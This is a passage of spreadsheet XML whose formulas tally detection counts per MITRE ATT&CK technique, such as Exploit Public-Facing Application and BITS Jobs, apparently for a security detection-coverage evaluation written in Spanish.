        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>3</v>
      </c>
      <c r="BK33" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (3)</v>
      </c>
      <c r="BL33" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM33" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0.5</v>
      </c>
      <c r="BN33" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>3</v>
      </c>
      <c r="BO33" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>12</v>
      </c>
      <c r="BP33" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>12</v>
      </c>
      <c r="BQ33" s="4" t="str">
        <f t="shared" si="10"/>
        <v>12 (12)</v>
      </c>
      <c r="BR33" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS33" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>5</v>
      </c>
      <c r="BT33" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU33" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>5</v>
      </c>
      <c r="BV33" s="292">
        <v>9</v>
      </c>
      <c r="BW33" s="322">
        <v>6</v>
      </c>
      <c r="BX33" s="4" t="str">
        <f t="shared" si="11"/>
        <v>6 (9)</v>
      </c>
      <c r="BY33" s="12">
        <v>2</v>
      </c>
      <c r="BZ33" s="13">
        <v>1</v>
      </c>
      <c r="CA33" s="394">
        <v>4</v>
      </c>
      <c r="CB33" s="288">
        <v>18</v>
      </c>
      <c r="CC33" s="4">
        <v>10</v>
      </c>
      <c r="CD33" s="4" t="str">
        <f t="shared" si="12"/>
        <v>10 (18)</v>
      </c>
      <c r="CE33" s="4">
        <v>2</v>
      </c>
      <c r="CF33" s="4">
        <v>1</v>
      </c>
      <c r="CG33" s="13">
        <v>1</v>
      </c>
      <c r="CH33" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="34" spans="1:86" ht="15" customHeight="1">
      <c r="A34" s="4">
        <f t="shared" si="13"/>
        <v>32</v>
      </c>
      <c r="B34" s="4" t="str">
        <f>IFERROR(VLOOKUP(A34,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1190</v>
      </c>
      <c r="C34" s="493" t="str">
        <f>IFERROR(VLOOKUP(B34,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="D34" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B34)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>5</v>
      </c>
      <c r="E34" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>130</v>
      </c>
      <c r="F34" s="579" t="str">
        <f t="shared" si="14"/>
        <v>5 (130)</v>
      </c>
      <c r="G34" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>43</v>
      </c>
      <c r="H34" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>41</v>
      </c>
      <c r="I34" s="322" t="str">
        <f t="shared" si="0"/>
        <v>41 (43)</v>
      </c>
      <c r="J34" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>7</v>
      </c>
      <c r="K34" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0.8</v>
      </c>
      <c r="L34" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>39</v>
      </c>
      <c r="M34" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>216</v>
      </c>
      <c r="N34" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>214</v>
      </c>
      <c r="O34" s="322" t="str">
        <f t="shared" si="1"/>
        <v>214 (216)</v>
      </c>
      <c r="P34" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>23</v>
      </c>
      <c r="Q34" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R34" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>106</v>
      </c>
      <c r="S34" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>259</v>
      </c>
      <c r="T34" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>255</v>
      </c>
      <c r="U34" s="4" t="str">
        <f t="shared" si="2"/>
        <v>255 (259)</v>
      </c>
      <c r="V34" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>30</v>
      </c>
      <c r="W34" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X34" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>114</v>
      </c>
      <c r="Y34" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>395</v>
      </c>
      <c r="Z34" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>384</v>
      </c>
      <c r="AA34" s="322" t="str">
        <f t="shared" si="3"/>
        <v>384 (395)</v>
      </c>
      <c r="AB34" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>30</v>
      </c>
      <c r="AC34" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD34" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>123</v>
      </c>
      <c r="AE34" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>318</v>
      </c>
      <c r="AF34" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>305</v>
      </c>
      <c r="AG34" s="322" t="str">
        <f t="shared" si="4"/>
        <v>305 (318)</v>
      </c>
      <c r="AH34" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>38</v>
      </c>
      <c r="AI34" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ34" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>110</v>
      </c>
      <c r="AK34" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>642</v>
      </c>
      <c r="AL34" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>622</v>
      </c>
      <c r="AM34" s="322" t="str">
        <f t="shared" si="5"/>
        <v>622 (642)</v>
      </c>
      <c r="AN34" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>65</v>
      </c>
      <c r="AO34" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP34" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>123</v>
      </c>
      <c r="AQ34" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR34" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS34" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT34" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU34" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV34" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW34" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>5</v>
      </c>
      <c r="AX34" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>5</v>
      </c>
      <c r="AY34" s="322" t="str">
        <f t="shared" si="7"/>
        <v>5 (5)</v>
      </c>
      <c r="AZ34" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>5</v>
      </c>
      <c r="BA34" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0.6</v>
      </c>
      <c r="BB34" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>3</v>
      </c>
      <c r="BC34" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>264</v>
      </c>
      <c r="BD34" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>260</v>
      </c>
      <c r="BE34" s="4" t="str">
        <f t="shared" si="8"/>
        <v>260 (264)</v>
      </c>
      <c r="BF34" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>35</v>
      </c>
      <c r="BG34" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH34" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>114</v>
      </c>
      <c r="BI34" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>202</v>
      </c>
      <c r="BJ34" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>188</v>
      </c>
      <c r="BK34" s="322" t="str">
        <f t="shared" si="9"/>
        <v>188 (202)</v>
      </c>
      <c r="BL34" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>7</v>
      </c>
      <c r="BM34" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN34" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>114</v>
      </c>
      <c r="BO34" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>370</v>
      </c>
      <c r="BP34" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>356</v>
      </c>
      <c r="BQ34" s="4" t="str">
        <f t="shared" si="10"/>
        <v>356 (370)</v>
      </c>
      <c r="BR34" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>7</v>
      </c>
      <c r="BS34" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>7</v>
      </c>
      <c r="BT34" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU34" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>123</v>
      </c>
      <c r="BV34" s="292">
        <v>197</v>
      </c>
      <c r="BW34" s="322">
        <v>167</v>
      </c>
      <c r="BX34" s="4" t="str">
        <f t="shared" si="11"/>
        <v>167 (197)</v>
      </c>
      <c r="BY34" s="12">
        <v>4</v>
      </c>
      <c r="BZ34" s="13">
        <v>0.6</v>
      </c>
      <c r="CA34" s="394">
        <v>121</v>
      </c>
      <c r="CB34" s="288">
        <v>394</v>
      </c>
      <c r="CC34" s="4">
        <v>288</v>
      </c>
      <c r="CD34" s="4" t="str">
        <f t="shared" si="12"/>
        <v>288 (394)</v>
      </c>
      <c r="CE34" s="4">
        <v>4</v>
      </c>
      <c r="CF34" s="4">
        <v>1</v>
      </c>
      <c r="CG34" s="13">
        <v>0.6</v>
      </c>
      <c r="CH34" s="394">
        <v>121</v>
      </c>
    </row>
    <row r="35" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A35" s="4">
        <f t="shared" si="13"/>
        <v>33</v>
      </c>
      <c r="B35" s="4" t="str">
        <f>IFERROR(VLOOKUP(A35,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1197</v>
      </c>
      <c r="C35" s="493" t="str">
        <f>IFERROR(VLOOKUP(B35,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>BITS Jobs</v>
      </c>
      <c r="D35" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B35)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E35" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>43</v>
      </c>
      <c r="F35" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (43)</v>
      </c>
      <c r="G35" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>7</v>
      </c>
      <c r="H35" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>3</v>
      </c>
      <c r="I35" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (7)</v>
      </c>
      <c r="J35" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>2</v>
      </c>
      <c r="K35" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L35" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>3</v>
      </c>
      <c r="M35" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>38</v>
      </c>
      <c r="N35" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>32</v>
      </c>
      <c r="O35" s="322" t="str">
        <f t="shared" si="1"/>
        <v>32 (38)</v>
      </c>
      <c r="P35" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>6</v>
      </c>
      <c r="Q35" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R35" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>10</v>
      </c>
      <c r="S35" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>45</v>
      </c>
      <c r="T35" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>35</v>
      </c>
      <c r="U35" s="4" t="str">
        <f t="shared" si="2"/>
        <v>35 (45)</v>
      </c>
      <c r="V35" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>8</v>
      </c>
      <c r="W35" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X35" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>11</v>
      </c>
      <c r="Y35" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>53</v>
      </c>
      <c r="Z35" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>37</v>
      </c>
      <c r="AA35" s="322" t="str">
        <f t="shared" si="3"/>
        <v>37 (53)</v>
      </c>
      <c r="AB35" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>8</v>
      </c>
      <c r="AC35" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD35" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>13</v>
      </c>
      <c r="AE35" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>62</v>
      </c>
      <c r="AF35" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>48</v>
      </c>
      <c r="AG35" s="322" t="str">
        <f t="shared" si="4"/>
        <v>48 (62)</v>
      </c>
      <c r="AH35" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>12</v>
      </c>
      <c r="AI35" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ35" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>12</v>
      </c>
      <c r="AK35" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>115</v>
      </c>
      <c r="AL35" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>85</v>
      </c>
      <c r="AM35" s="322" t="str">
        <f t="shared" si="5"/>
        <v>85 (115)</v>
      </c>
      <c r="AN35" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>21</v>
      </c>
      <c r="AO35" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP35" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>15</v>
      </c>
      <c r="AQ35" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR35" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS35" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT35" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU35" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV35" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW35" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>12</v>
      </c>
      <c r="AX35" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>6</v>
      </c>
      <c r="AY35" s="322" t="str">
        <f t="shared" si="7"/>
        <v>6 (12)</v>
      </c>
      <c r="AZ35" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>2</v>
      </c>
      <c r="BA35" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB35" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>6</v>
      </c>
      <c r="BC35" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>57</v>
      </c>
      <c r="BD35" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>41</v>
      </c>
      <c r="BE35" s="4" t="str">
        <f t="shared" si="8"/>
        <v>41 (57)</v>
      </c>
      <c r="BF35" s="4">
